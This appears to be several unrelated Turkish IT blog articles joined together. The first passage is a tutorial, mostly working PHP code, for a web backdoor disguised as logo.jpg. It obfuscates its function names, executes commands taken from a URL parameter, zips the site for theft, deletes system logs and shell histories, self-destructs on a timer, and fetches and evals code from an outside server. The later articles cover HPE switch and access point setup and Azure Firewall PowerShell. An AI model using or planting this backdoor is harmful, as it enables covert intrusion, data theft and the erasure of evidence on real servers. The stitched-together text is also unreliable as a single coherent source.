Böylece, hedefsite.com/logo.jpg?i=lgsl olarak giriş yapıldığında sistemde kayıt edilen log’ların bir kısmı silinecektir. Daha da geliştirmek istenilirse, kontrol paneli log’ları veya veritabanında tutulan log’lar da sildirilebilir.

Kendi Kendini İmha Etme:

Backdoor işini bitirdikten sonra yakalanmamak için kendini imha etmelidir. Bu işlem genelde backdoor’ların çalışma mantığına terstir çünkü backdoor sistemde bir yerlerde sürekli varlığını korumalıdır ki işimiz düştüğünde kullanabilelim. Fakat yazının sonunda yukarıda yaptığımız işlerin hepsini otomatik gerçekleştiren bir virüs yazacağımız için oto-imha özelliğini de eklemek istiyorum.

Aşağıdaki kod işimizi görecektir.

if(@$_GET['i'] == 'bom'){

@unlink(__FILE__);

}

Böylece, hedefsite.com/logo.jpg?i=bom şeklinde girdiğimiz zaman backdoor kendi kendisini imha edecektir.

Birleştirelim

Şimdi de yukarıda tek tek yazdığımız özelliklerin hepsini bir araya toplayalım:

<?php

error_reporting(0);

$kmtfunc   = 's'.'yS'.'t'.'eM';

$funcbir = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

if($_GET['i'] == 'ydk'){

$mydk  = $funcbir('$nydk', $kmtfunc . '($nydk);');

$mydk('zip -r x.zip '.$_SERVER["DOCUMENT_ROOT"].' && mv x.zip ./wp-content/uploads/');

}

if($ckmt = $_GET['c']){

$mkmt  = $funcbir('$nkmt', $kmtfunc . '($nkmt);');

$mkmt($ckmt);

}

if($_GET['i'] == 'lgsl'){

$mlgsl  = $funcbir('$nlgsl', $kmtfunc . '($nlgsl);');

$sllgsl = 'rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

find / -name *.bash_history -exec rm -rf {} ;

find / -name *.bash_logout -exec rm -rf {} ;

find / -name "log*" -exec rm -rf {} ;

find / -name *.log -exec rm -rf {} ;';

$mlgsl($sllgsl);

}

if($_GET['i'] == 'bom'){

@unlink(__FILE__);

}

·         Dosyaların yedeğini almak için: http://hedefsite.com/logo.jpg?i=ydk

·         Komut çalıştırmak için: http://hedefsite.com/logo.jpg?c=komut

·         Log’ları silmek için: http://hedefsite.com/logo.jpg?i=lgsl

·         Backdoor’u silmek için: http://hedefsite.com/logo.jpg?i=bom

şeklinde giriş yapmamız yeterli.

Böylelikle aslında temel ihtiyaçları gerçekleştirebilecek basit bir backdoor yazdık. Şimdi yazının başında bahsettiğimiz zamanlama (kendi kendini yönetme) kısmına gelelim.

Bir tarih ayarlayacağız, o tarihi geçtikten sonra virüsümüz son kez çalışacak ve kendini hemen imha edecek.

Aşağıdaki kod işimizi görecektir:

if(!$_SESSION['sldr']){

$_SESSION['sldr'] = time();

}else{

if($_SESSION['sldr']+3600<time()){

// yedek alma

$kmtfunc   = 's'.'yS'.'t'.'eM';

$funcbir = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

$mydk  = $funcbir('$nydk', $kmtfunc . '($nydk);');

$mydk('zip -r x.zip '.$_SERVER["DOCUMENT_ROOT"].' && mv x.zip ./wp-content/uploads/');

// komut verme

$ckmt = "ls"; // sunucuya verilecek komut

$mkmt  = $funcbir('$nkmt', $kmtfunc . '($nkmt);');

$mkmt($ckmt);

// l o g silme

$mlgsl  = $funcbir('$nlgsl', $kmtfunc . '($nlgsl);');

$sllgsl = 'rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

find / -name *.bash_history -exec rm -rf {} ;

find / -name *.bash_logout -exec rm -rf {} ;

find / -name "log*" -exec rm -rf {} ;

find / -name *.log -exec rm -rf {} ;';

$mlgsl($sllgsl);

// kendini imha et

@unlink(__FILE__);

}

}

Mor kısımdaki 3600 yazan yere bütün işlemler kaç saniye sonra gerçekleşsin istiyorsak onu yazacağız. 1 saat için 3600 saniye gibi. Ayrıca, PHP tag’inden sonra dosyanın en başına session_start(); fonksiyonu eklemeliyiz.

Son olarak kodlarımızı toparlayacak olursak,

·         .htaccess kodları:

AddType application/x-httpd-php .php .jpg

·         logo.jpg kodları:

<?php

error_reporting(0);

$x = "ht";

$y = "tp";

$z = "s:";

$a = "//infinitumit.";

$b = "co";

$c = "m.tr/kodlar/virus.txt";

$k  = 'e'.'vA'.'l';

$l = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

$m  = $l('$n', $k . '($n);');

$m(@file_get_contents($x.$y.$z.$a.$b.$c));

·         virus.txt (sitemizden çekeceğimiz dosyanın) kodları:

<?php

session_start();

error_reporting(0);

$kmtfunc   = 's'.'yS'.'t'.'eM';

$funcbir = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

if($_GET['i'] == 'ydk'){

$mydk  = $funcbir('$nydk', $kmtfunc . '($nydk);');

$mydk('zip -r x.zip '.$_SERVER["DOCUMENT_ROOT"].' & & mv x.zip ./wcp/');

}

if($ckmt = $_GET['c']){

$mkmt  = $funcbir('$nkmt', $kmtfunc . '($nkmt);');

$mkmt($ckmt);

}

if($_GET['i'] == 'lgsl'){

$mlgsl  = $funcbir('$nlgsl', $kmtfunc . '($nlgsl);');

$sllgsl = 'rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

find / -name *.bash_history -exec rm -rf {} ;

find / -name *.bash_logout -exec rm -rf {} ;

find / -name "log*" -exec rm -rf {} ;

find / -name *.log -exec rm -rf {} ;';

$mlgsl($sllgsl);

}

if($_GET['i'] == 'bom'){

@unlink(__FILE__);

}

if(!$_SESSION['sldr']){

if($_GET['i'] == 'zmn'){

$_SESSION['sldr'] = time();

}

}else{

if($_SESSION['sldr']+3600 < time()){

// yedek alma

$mydk  = $funcbir('$nydk', $kmtfunc . '($nydk);');

ob_start();

$mydk('zip -r x.zip '.$_SERVER["DOCUMENT_ROOT"].' && mv x.zip ./wcp/');

ob_clean();

// komut verme

$ckmt = "ls"; // sunucuya verilecek komut

$mkmt  = $funcbir('$nkmt', $kmtfunc . '($nkmt);');

ob_start();

$mkmt($ckmt);

ob_clean();

// l o g silme

$mlgsl  = $funcbir('$nlgsl', $kmtfunc . '($nlgsl);');

$sllgsl = 'rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

find / -name *.bash_history -exec rm -rf {} ;

find / -name *.bash_logout -exec rm -rf {} ;

find / -name "log*" -exec rm -rf {} ;

find / -name *.log -exec rm -rf {} ;';

$mlgsl($sllgsl);

// kendini imha et

@unlink(__FILE__);

}

}

Böylelikle hedef siteye yaklaşık 300 bayt boyutunda fakat gizli ve etkili bir backdoor virüsü yerleştirmiş olduk. Dosyalarınız arasında tarama yaparken,

1.      Tüm dosya uzantılarını içerecek geniş kapsamlı bir tarama yapmayı,

2.      Hem manuel hem de antivirus/firewall yazılımları ile tarama yapmayı,

3.      Boyutu küçük dosyaları da tarama kapsamına almayı,

unutmayın.

Birlikte daha güvenli günlere…

HPE’nin yeni serisi OfficeConnect 1920S Switch, bant genişliği gerektiren uygulamaları desteklemek üzere gelişmiş performans gerektiren ufak ölçekli işletmeler için tasarlanmıştır. Gelişmiş web tabanlı akıllı yönetime sahip olan bu seride tüm portlar Gigabit olarak gelmektedir. 8, 24 ve 48 portlu farklı konfigürasyonlara sahip olan seride ayrıca PoE+ ve PoE+ olmayan modelleri seçmekte mümkün. Ayrıca fiber bağlantı için; 24 port olan model 2 adet SFP, 48 port olan model ise 4 adet SFP yuvası içermektedir. Bu seri lite Layer 3 destekli olduğundan 32 adede kadar statik routing yapılabilmekte.

HPE OfficeConnect 1920S Switch üzerinde ilk kurulum ve temel vlan konfigürasyonunu yapıyor olacağız.

Hızlıca başlayalım.

HPE OfficeConnect 1920S serisi browser olarak en iyi internet explorer üzerinde çalışıyor, chrome tarayıcı üzerinde edit butonlarında problemler yaşanabiliyor. Switche ulaşmak için herhangi bir portuna bağlandıktan sonra https://192.168.1.1 adresinden erişim sağlıyorum. (Bağladığınız bilgisayara 192.168.1.x bloğundan ip vermeniz gerekiyor.)

Örnek olarak,

https://192.168.1.1 adresinden HPE OfficeConnect 1920S switch arayüzüne bağlandım.

Bizlere sade ve şık bir dashboard karşılıyor. İlk olarak system name ve sytem location bilgilerini dolduruyorum. Bu bilgiler önemli, ortamınızda birden çok switch varsa system information kısmı daha sonrasında konfig yaparken büyük avantaj sağlıyor.

Bilgileri doldurduktan sonra Setup Network kısmına geliyorum.

Burada switchimin default 192.168.1.1 olan adresini yapımda bulunan management için ayırdığım ip adresim ile değiştiriyorum ve apply butonu ile doğruluyorum.

Yeni verdiğim ip adresi ile aynı subnetten bilgisayarıma ip veriyorum. Yeni ip adresi ile giriş yaptıktan sonra, HPE OfficeConnect 1920S switch time konfigürasyonu yapacağım. System time ile ilgili menüyü açıyorum. Ortamımda NTP sunucum olmadığı için, saat ve tarih bilgisini görüldüğü gibi manuel time configuration altında manuel giriyorum ve apply ile onaylıyorum. Temel konfigürasyon işlemlerimiz tamam.

Ofisimde networkleri vlanlara böleceğim için vlan oluşturmam gerekiyor. Switch layer2 modunda çalışacak, özetle firewalldan gelen vlanlar trunk mod ile switch tarafına taşındıktan sonra bağlantılar sağlanacak.

Yeni bir vlan eklemek için Vlan > Configuration kısmında görüldüğü gibi default vlan ekli.

Add ile vlan eklemeye başlıyorum. Vlan id’mi yazdıktan sonra apply ile işlemi tamamlıyorum.

Vlanları ekledikten sonra vlan isimleri VLAN00xx olarak gelmekte. Yönetim kolaylığı için vlanı seçtikten sonra edit ile isimlerini düzenledim.

1,10,20,30,40 olarak 5 adet vlan bulunmakta. Bu vlanlar firewall üzerinde sonlanmış durumda.

Firewall üzerindeki vlan konfigürasyonuna girmeyeceğim fakat bu konuda detaylı makaleler forum üzerinde mevcut. Örnek olması açısından firewall üzerinden konfigürasyon örneği paylaşıyorum.

Firewall üzerinde vlan konfigürasyonu bu şekilde, internal interface üzerinden HPE OfficeConnect 1920S switch’imin 24.portuna ethernet kablomu bağlıyorum.

Portum aktif durumda.

Şimdi yapacağımız işlem, fortigate firewall üzerinden gelen vlanları trunk olarak kabul etmek ve 24 numaralı port konfigürasyonunu yapmak olacak.

Vlan > Port Membership kısmına geliyorum.

Görüldüğü gibi VLAN ID kısmında tüm vlanlarımı görüyoruz. 10,20,30,40 vlanlarını 24 numaralı porta trunk olarak atamamız gerekiyor.

Vlan 40’I Include ve Tagged olarak 24. Portuma ekliyorum. Ardından 10,20,30 vlanları için aynı işlemleri tekrarlıyorum.

Vlan 1’I tagged olarak değil untagged olarak işaretlemem gerekiyor. Çünkü switchime erişirken vlan 1 üzerinden erişim sağlayacağım.  Vlan 1’I seçtikten sonra 24.portuna edit ediyorum.

Açılan ekranda  Edit VLAN Port Membership kısmına geliyorum. VLAN 1’I Include olacak şekilde Untagged işaretledikten sonra apply ediyorum.

Yaptığımız işlemleri tek bir ekranda görmek için Port Configuration kısmına geliyorum.

Görüldüğü üzere tagged ve yönetim için untagged olarak eklediğim vlanlar ilgili portuma atanmış  durumda.

Vlan tagged ve untagged işlemlerim bu kadar basit bir şekilde web browser ile tamamlandı. Devamında portları ilgili vlanlara üye yapacağız. Port 3,4,5 ve 6’yı personel olarak konfig edeceğim. Çoklu seçim yaptıktan sonra ve Vlan Id’yi 20 seçtikten sonra edit ile devam ediyorum.

Vlan 20’yi Include ve Untagged olacak şekilde apply ediyorum.

Yaptığımız işlemleri tek bir ekranda görmek için Port Configuration kısmına geliyorum. Görüldüğü gibi ilgili portlar, personel vlanına atandı. HPE OfficeConnect 1920S genel switch konfigürasyonunu ve vlan işlemlerini tamamladık.

Save configuration ile işlemleri kalıcı hafızaya yazdırıyoruz.

Testini yapmak için bilgisayarımı 4. Porta ethernet ile bağlıyorum. (Firewall üzerinde dhcp ip dağıtır durumdadır.)

Bilgisayarım 4.porta atanmış 192.168.20.x subnetli vlan üzerinden ip alma işlemini gerçekleştirdi.

Görüldüğü üzere HPE OfficeConnect 1920s serisi üzerinde konfigürasyon web tarayıcı üzerinden oldukça basit bir şekilde gerçekleştiriliyor.

Makaleyi bitirmeden önce admin hesabının default şifresini değiştirelim. Setup Network > User Accounts kısmına geliyorum.

Admin kullanıcısını seçtikten sonra edit diyorum.

Yeni şifremi girdikten sonra apply ile onaylıyorum.

Bu makalemizde HPE OfficeConnect 1920S Switch üzerinde ilk kurulum ve temel vlan konfigürasyonlarını anlatmış olduk. Umarım faydalı bir makale olmuştur. Bir sonraki makalemizde görüşmek dileğiyle.

Bir önceki makalemizde HPE OfficeConnect 1920S Switch üzerinde ilk kurulum ve temel vlan konfigürasyonunu anlatmıştık. Bu makalemizde ise HPE OfficeConnect OC20 802.11ac serisi Access Point kurulum ve konfigürasyonlarından bahsedeceğiz. Bir önceki makaleme aşağıdaki link üzerinden ulaşabilirsiniz

http://www.cozumpark.com/blogs/hewlett-packard/archive/2018/10/21/hpe-officeconnect-1920s-switch-kurulum-ve-temel-vlan-ayarlari.aspx

HPE OfficeConnect OC20, özel BT kaynaklarına sahip olmayan kurumlar için tasarlanmış, uygun maliyetli kablosuz bir çözümdür. OC20 ile küçük işletmeler veya onların kanal iş ortakları için tasarlanmış olan kablosuz ağınızı hızlıca kurup yönetebilirsiniz.

Aruba’nın yeni HPE OfficeConnect OC20 kablosuz çözümü, küçük işletmeler için teknik uzmanlık gerektirmeden; yönetilmesi kolay, pratik ve uygun maliyetli bir kablosuz çözüm sunarak bu zorlukları gideriyor. OC20 AP’ler, ses, video ve bulut tabanlı uygulamalar da dahil olmak üzere günümüzün kritik iş uygulamalarını idare etmek için yüksek performanslı ve güvenilir Wi-Fi bağlantısı sağlıyorlar. Güçlü bir son kullanıcı deneyimi sağlamak için parazitleri en aza indirirken, kablosuz kapsama alanını ve performansı akıllıca optimize ediyorlar. Dahili web sitesi filtresi de, küçük işletme ağını uygun olmayan veya uyumlu olmayan web sitelerinin yanı sıra online tehditlerden korumak için, kötü amaçlı web sitelerine erişimi engelliyor.

Kurulum süresini azaltıyor

OfficeConnect mobil uygulamasını kullanarak, bir işletme veya bayi, bir ağı herhangi bir yerden birkaç dakika içinde yapılandırabilir ve izleyebilir. Birden çok ofis aynı anda yönetilebilir ve BT birimi veya kullanıcının kanal iş ortağı, ağı devre dışı bırakmadan, ağ değişikliklerine ve kesintilere uzaktan hızlı bir şekilde yanıt verebiliyor.

İşletmeler ağlarını genişletmeye hazır olduğunda, yeni OC20 AP’ler otomatik olarak ağa katılabilir ve önceden yapılandırılmış bir OC20 AP’den yapılandırma ayarlarını kopyalayabilirler. İşletme sahipleri veya onların kanal iş ortakları, markalı bir Wi-Fi deneyimi için kendi şirket logosunu da içeren, açık konuk erişimi, basit şifre ile giriş veya Facebook Wi-Fi oturumu açma seçenekleriyle isteğe bağlı ve ayrı bir konuk ağı yaratmak mümkün.

Uzaktan izleme ve sorun tespiti

IOS veya Android telefonlar üzerinden indirebileceğiniz mobil uygulama “HPE OfficeConnect Wi-Fi Portal” ile; kablosuz ağınızı uzaktan izleyebilir, olası sorunların tespiti konusunda müdahalede bulunabilirsiniz.

Bir ağ sağlık panosu, kablosuz performans, aygıt sayısı ve Wi-Fi ağına kimin bağlı olduğu gibi konularda bir bakışta ağ hakkında bilgilerin görülebilmesini sağlıyor.

Aruba, OC20 Erişim Noktasına ek olarak, küçük işletme ağlarının güvenliğini sağlayan ve onları genişleten OfficeConnect 1920S anahtarını da sunuyor. 1920S ayrıca, OfficeConnect mobil uygulaması ile de izlenebiliyor.

Kısa bir giriş yaptıktan sonra, yeni bir ürün aldığımızda en sevilen kısım kutu açılımıdır sanırım. Kuruluma başlamadan önce kutu içeriğinde bizleri nelerin beklediğini yazmak istiyorum.

Hpe OfficeConnect OC20

9/16 Tavan Rayı

15/16 Tavan Rayı

Duvar Braketi

HPE OfficeConnect OC20 ürününü kutu içerisinden eksiksiz, tüm yüzeye uygun aparatlar ile birlikte kolayca montajını yapabilirsiniz.

Montaj Örnekleri,

HPE OfficeConnect OC20 ürününün montaj aşamasını gördükten sonra, ürünün arka yüzeyini inceleyebiliriz.

Poe destekli ethernet portu

Dc güç girişi

Konsol portu

OC20 Sıfırlama (reset) düğmesi

Kilid yuvası

Poe destekli bir OfficeConnect 1920S gibi bir switchiniz varsa enerjiyi poe üzerinden sağlayabilirsiniz. Bu sayede cihazın enerjisi için ikinci bir elektrik kablosuna ihtiyaç duymaz, tek bir ethernet kablosu ile kolayca montajını tamamlayabilirsiniz. Eğer poe destekli bir switchiniz yoksa, DC güç girişinden adaptör ile enerji sağlamanız gerekmektedir.

Dc güç girişi ile enerji verilmek isteniyorsa AP-AC-12V30B kodlu güç adaptörü HPE’den alınabilir veya cihazın desteklediği bir adaptör kullanılabilir.

Adaptör bilgisi: 12 Vdc (+/- 5%) ve en az 12W Merkez-pozitif 2,1/5,5 mm dairesel fiş, 9,5 mm uzunluk

Cihazın ön tarafını inceleyecek olursak, cihaz üzerinde iki adet ışık bulunmaktadır.

Sistem ve Radyo durumu,

Sistem Durumu

[Yeşil] yanıp sönüyor.       > Cihaz başlatılıyor.

[Yeşil] sürekli yanıyor.       > Cihaz kullanıma hazır durumda.

Radyo Durumu

[Yeşil] sürekli yanıyor.        > 2.4 ghz ve 5.0 ghz erişim etkin.

[Yeşil] yanıp sönüyor.         >  Bir radio etkin.

[Kehribar] sürekli yanıyor .> İki radio kuruluma müsait.

[Kehribar] yanıp sönüyor.  > Bir radio kuruluma müsait.

**Cihaz ip adresini dhcp servisinden alamazsa sistem durumu ışığı kırmızı yanıp sönecektir. Bu durumda dhcp sunucunuzun o porta ip dağıttığından emin olmanız gerekmekte.

Iphone> https://itunes.apple.com/us/app/hpe-officeconnect-wi-fi-portal/id1250178607

Android cihazlar için 11MB, İphone cihazlar için ise 19 MB gibi düşük boyutlu ve kurulumu saniyeler içerisinde gerçekleşen bir uygulama.

Bizlere giriş sayfasında yeni bir kurulum mu yapılacak yoksa daha önceki kurulmuş olan hesap bilgileriyle mi giriş yapacağımız sorusu yöneltiliyor.

HPE OfficeConnect OC20 cihazımız açık konumda olduğunda bizlere ilk kurulumda OfficeConnect.XXXX olarak geçici şifresiz bir kablosuz ssid yayınlar.

Telefonumun ayarlar kısmından OfficeConnect.XXXX ile başlayan wi-fi’a bağlanmamı istiyor.

OfficeConenct.CNDLJSTMG7 wifi ismiyle OC20 access point’im gelmiş durumda.

Wifi bağlantısına bağlanıyorum.

Wifi bağlantısı sağlandıktan sonra uygulamanın kendisi otomatik olarak ağımızdaki cihazları tarıyor.

Kısa bir süre bekledikten sonra cihazımızı önümüze getiriyor.

Hpe Officeconnect 0C20 cihazımı buldu ve kurulum için Set it up seçeneği aktif oldu.

Create a Network kısmına geldim. Burada kablosuz ağ adımızı ve şifremi belirliyorum.

Görüldüğü gibi CozumPark isimli şifresi Cozum123. Olan bir kablosuz network oluşturmak için bilgileri girdim.

HPE OfficeConnect Wi-Fi Portal uygulaması cihazlarınızı nerede olursanız olun, anlık takip edebileceğiniz bir uygulama olduğu için, OfficeConnect portal hesabına ihtiyacımız var. Bu hesabı ilk defa oluşturacağım için Email adresimi ve şifremi girerek hızlıca hesabımı oluşturuyorum.

Hpe Officeconnect 0C20 cihazının konfigürasyonu ve Hpe OfficeConnect Portal hesabının oluşturulması ve aktif edilmesi tamamlandı. Herşey iki üç tıktan ibaret.

Oluşturmuş olduğumuz CozumPark kablosuz ağ adı artık kullanılabilir durumda. Kablosuz cihazları bu oluşturduğumuz ağ üzerinden internete bağlayabilirsiniz.Sol tarafta ki ekranda yeni kablosuz ağımıza bağlanmamız isteniyor.

Telefonumun kablosuz ağ kısmına geliyorum.

CozumPark isimli wi-fi’yi görüyorsunuz, yeni ağımız yerini almış. Hemen vermiş olduğum şifre ile bağlantımı gerçekleştiriyorum.

HPE OfficeConnect Wi-Fi Portal uygulamasına geri dönüyorum.

Ana ekran üzerinde sistemimizle ilgili çok güzel detaylar yer alıyor.

HPE OfficeConnect Wi-Fi Portal uygulamasının karşılama ekranında, kablosuz performans bilgilerini, kablosuz ağımıza bağlı olan cihazların kimler olduğunu, sistemin sağlık durumunu tek bir ekrandan kolayca görebiliyorsunuz.

Misafirlerimiz için kablosuz ağımızı oluşturamaya başlayalım.

HPE OfficeConnect Wi-Fi Portal üzerinden Network kısmına tıklıyorum.

CozumPark isimli kablosuz networkümüzü burada görebiliyoruz.Kablosuz networkünüzün şifresini değiştirmek isterseniz, üzerine gelip tek tık ile şifresini değiştirebilirsiniz.

Ufak bir bilgi verdikten sonra misafir ağımı oluşturmak için misafir hesabının devre dışı olduğunu görüyorum.

Misafirlerimiz için kablosuz network oluşturacağımız sayfa açılıyor.

Network name ile misafirlerimiz için kablosuz isim belirliyorum.

Secured using kısmında iki seçenek mevcut.

No security seçimi ile devam edersek misafir ağımız şifresiz olarak hizmet vermeye başlar. Burada Facebook ile giriş seçeneği mevcut, isteğinize bağlı olarak kullanıcılar wi-fi ile ağınıza bağlandığında otomatik bir sayfa açılarak şirketinizin logosunu barındıran bir web sayfası üzerinden Facebook ile kimlik doğrulaması yapılabilir.

Klasik olarak ise Password kısmından, şifre belirleyerek misafir networkümüzü kurabiliriz.

Allow or block applications ile misafirlerimizin internet kullanımı kısıtlayabilmekteyiz. (Makalenin ilerleyen kısımlarında deneyeceğim.)

Add a network access schedule ile misafir networkümüzün hangi zaman aralığında açık kalacağını belirleyebiliriz.

Network Schedule bölümünü de paylaşmak istiyorum.

Haftanın belirli günlerinde veya belirli saatlerinde misafir ağımızı otomatik olarak planlanan zamanlarda açılıp kapanmasını sağlayabilrsiniz. Bu sayede mesai saatleri dışında kullanımına kapatmanız faydalı olacaktır.

 

Kablosuz ağımızın tüm konfigürasyonları yaptık ve sistemi kolayca çalışır duruma getirdik. Makalemin başımda bahsetmiş olduğum dahili web sitesi filtreleme işlemini uygulayalım. Çalışanlarınız ve misafirleriniz için ayrı ayrı web sitelerinde erişim engeli koyabiliyorsunuz.

HPE OfficeConnect Wi-Fi Portal uygulamasının ana ekranına geliyorum ve Network kısmına tıklıyorum.

CozumPark isimli kablosuz ağımın üzerine tıklıyorum.

High security risk kategorisini çalışanlarım için engelliyorum. Bundan böyle HPE tarafından zararlı içerik barındıran sitelerin erişimi engelleniyor.

Bu makalemizde HPE OfficeConnect OC20 802.11ac serisi Access Point kurulum ve konfigürasyonunun nasıl yapılacağından bahsettik. Umarım faydalı bir makale olmuştur. Bir sonraki makalemizde görüşmek dileğiyle.

Azure Firewall, Azure Virtual Network kaynaklarınızı koruyan, yönetilen, bulut tabanlı bir güvenlik hizmetidir.

Azure Firewall şu anda yönetilen genel önizleme aşamasındadır. “Register-AzureRmProviderFeature” PowerShell komutunu kullanarak bu uygulamayı açıkça etkinleştirmiş olursunuz.

Bu genel önizleme bir hizmet düzeyi sözleşmesi olmadan sağlanır ve üretim iş yüklerinde kullanılmamalıdır. Belirli özellikler desteklenmiyor olabilir, kısıtlı yeteneklere sahip olabilir veya tüm Azure bölgelerinde mevcut olmayabilir.

Resim 01

Aboneliklerle sanal ağlarda uygulama ve ağ bağlantısı ilkelerini merkezi olarak oluşturabilir, zorlayabilir ve günlüğe alabilirsiniz. Azure Firewall, dış güvenlik duvarlarının sanal ağınızdan kaynaklanan trafiği tanımlamasına olanak tanımak amacıyla sanal ağ kaynaklarınız için statik genel bir IP adresi kullanır. Hizmet, günlük ve analiz için Azure İzleyici ile tamamen tümleşik çalışır.

Azure Güvenlik Duvarı genel önizlemesi şu özellikleri sunar:

Yerleşik yüksek kullanılabilirlik

Yüksek kullanılabilirlik yerleşiktir; bu nedenle, ek bir yük dengeleyici gerekmez ve yapılandırmanız gereken hiçbir şey yoktur.

Kısıtlamasız bulut ölçeklenebilirliği

Azure Firewall, değişen ağ trafiği akışlarıyla başa çıkmak için gerek duyduğunuz kadar ölçeklenebilir, bu sayede trafiğinizin en yoğun olduğu durum için bütçe ayarlamak zorunda kalmazsınız.

FQDN filtreleme

Giden HTTP/S trafiğini, joker karakter de içerebilen tam etki alanı adlarının (FQDN) belirtilen bir listesiyle sınırlayabilirsiniz. Bu özelliğe SSL sonlandırması gerekmez.

Ağ trafiği filtreleme kuralları

Ağ filtreleme kurallarını kaynak ve hedef IP adresine, bağlantı noktasına ve protokole göre merkezi olarak oluşturabilir, izin verebilir veya reddedebilirsiniz. Azure Güvenlik Duvarı tamamen durum bilgisine sahiptir; bu nedenle, farklı türden bağlantıların geçerli paketlerini tanıyabilir. Kurallar, birden çok abonelik ve sanal ağda zorlanır ve günlüğe kaydedilir.

Giden SNAT desteği

Tüm giden sanal ağ trafiği IP adresleri Azure Güvenlik Duvarı genel IP’sine çevrilir (Kaynak Ağ Adresi Çevirisi). Sanal ağınızdan kaynaklanan uzak İnternet hedeflerine yönelik trafiği tanımlayabilir ve buna izin verebilirsiniz.

Azure İzleyici günlükleri

Günlükleri depolama hesabında arşivleyebilmeniz, olayların Event Hub'a akışını yapabilmeniz ve bunları Log Analytics'e gönderebilmeniz için, tüm olaylar Azure Monitor ile tümleştirilmiştir.

Azure Firewall hakkında genel olarak bilgileri paylaştık. Peki Azure Firewall’u nasıl etkinleştirebiliriz?

İşlemi portal üzerinden veya PowerShell kullanarak gerçekleştirebiliyoruz. Ben PowerShell kullanarak bu işlemleri gerçekleştireceğim.

##Azure aboneliğine girişi sağlıyoruz.

Login-AzureRmAccount

##Birden fazla Azure aboneliğimiz varsa abonelik listesini çekiyoruz.

Get-AzureRmSubscription

##Çalışmayı gerçekleştireceğimiz aboneliği seçiyoruz.

Select-AzureRmSubscription-SubscriptionName"Visual Studio Offer"

Resim 02

#Kaynakgrubu ve lokasyon bilgilerini aşağıdaki değişkenlere giriyoruz.

$RG="rg-seyhan"

$Location="westeurope"

#Tüm lokasyon listesini görmek için aşağıdaki komutu çalıştırabilirsiniz.

Get-AzureRmLocation|SelectLocation

Resim 03

#Kaynak grubu oluşturuyoruz.

New-AzureRmResourceGroup-Name$RG-Location$Location

Resim 04

#Azure üzerinde oluşturmuş olduğumuz kaynak grubu içerisine sanal ağ oluşturuyoruz.

$VnetName=$RG+"Vnet"

New-AzureRmVirtualNetwork-ResourceGroupName$RG-Name$VnetName-AddressPrefix192.168.0.0/16-Location$Location

Resim 05

#Oluşturmuş olduğumuz sanağ ağ içerisinde ağ içerisinde kullanılacak olan alt ağları belirliyoruz. Burada "AzureFirewallSubnet" isminin kullanılması gerekiyor.

$vnet=Get-AzureRmVirtualNetwork-ResourceGroupName$RG-Name$VnetName

Add-AzureRmVirtualNetworkSubnetConfig-NameAzureFirewallSubnet-VirtualNetwork$vnet-AddressPrefix192.168.1.0/24

Add-AzureRmVirtualNetworkSubnetConfig-NameFrontEndSubnet-VirtualNetwork$vnet-AddressPrefix192.168.0.0/24

Add-AzureRmVirtualNetworkSubnetConfig-NameBackEndSubnet-VirtualNetwork$vnet-AddressPrefix192.168.2.0/24

Set-AzureRmVirtualNetwork-VirtualNetwork$vnet

Resim 06

#Azure üzerinde oluşturacağımız vm için ve yük dağıtıcı için genel ip adresi oluşturuyoruz.

$LBPipName=$RG+"PublicIP"

$LBPip=New-AzureRmPublicIpAddress-Name$LBPipName -ResourceGroupName$RG-Location$Location-AllocationMethodStatic-SkuStandard

$seyhanvmpip=New-AzureRmPublicIpAddress-Name"seyhanHostPublicIP" -ResourceGroupName$RG-Location$Location-AllocationMethodStatic-SkuBasic

Resim 07

# Sanal makine için ağ güvenlik grubu için, 3389 portunu açıyoruz.

$nsgRuleRDP=New-AzureRmNetworkSecurityRuleConfig-NamemyNetworkSecurityGroupRuleSSH  -ProtocolTcp-DirectionInbound-Priority1000-SourceAddressPrefix*-SourcePortRange*-DestinationAddressPrefix*-DestinationPortRange3389-AccessAllow

Resim 08

# Ağ güvenlik grubunu oluşturuyoruz.

$NsgName=$RG+"NSG"

$nsg=New-AzureRmNetworkSecurityGroup-ResourceGroupName$RG-Location$Location-Name$NsgName-SecurityRules$nsgRuleRDP

Resim 09

#Sanal sunucu üzerinde kullanacağımız hesap bilgilerini giriyoruz.

$securePassword=ConvertTo-SecureString'Password1***'-AsPlainText-Force

$cred=New-ObjectSystem.Management.Automation.PSCredential ("AzfwUser",$securePassword)

Resim 10

#Sanal makinemizi oluşturuyoruz.

$vnet=Get-AzureRmVirtualNetwork-ResourceGroupName$RG-Name$VnetName

$FrontEndSubnetId=$vnet.Subnets[1].Id

# Create a virtual network card and associate with seyhanvm public IP address
